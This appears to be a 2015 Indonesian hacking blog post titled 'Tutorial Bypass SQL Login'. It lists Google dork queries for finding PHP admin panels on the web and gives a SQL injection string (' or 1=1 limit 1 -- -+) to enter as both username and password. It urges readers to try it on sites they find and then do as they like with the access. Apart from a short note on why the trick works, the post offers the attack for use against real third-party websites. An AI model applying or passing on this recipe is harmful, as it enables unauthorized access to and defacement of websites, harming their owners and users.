Thursday, 14 May 2015

Tutorial Bypass SQL Login

xixixhi, temu lagi kita ^^
Nue Stay here :p

kali ini Nue akan menjelaskan sesuai dengan judul Thread kali ini.

Liat dulu Tampilannya ;)
#kenalan dulu gan ama exploitnya :v






Link Start:

[#] Dork
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/

[#] Langkah-langkah

1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini
http://target.com/hostfriendz/int/index.php

2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+


Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D


--- GAK AFDOL KALO BISA MEPES WEB TAPI GAK TAU CARA KERJANYA---

yang pernah nyoba exploit SQL injection Manual pasti dh paham deh,, yop SQL adalah query db yg terpasang di website :D nih baca cara kerja sql manual + ada tutornya juga loh (langsung praktek)  disini

yep kalo kalian dh ngerti cara kerja sql manual , sekarang saya tinggal lanjutkan dikit mengenai method bypass login ini :D => dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"






Sekian tutorial cupu dari Nue :D
semoga bermanfaat yaaaa,, jika ada kesalahan Nue minta maaf >3<
jika ada kesalahan penulisan ,, mohon minta revisinya di komentar ^^





Nuenomaru


Nuenomaru just an illusion in Cyber World





Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2


EmoticonEmoticon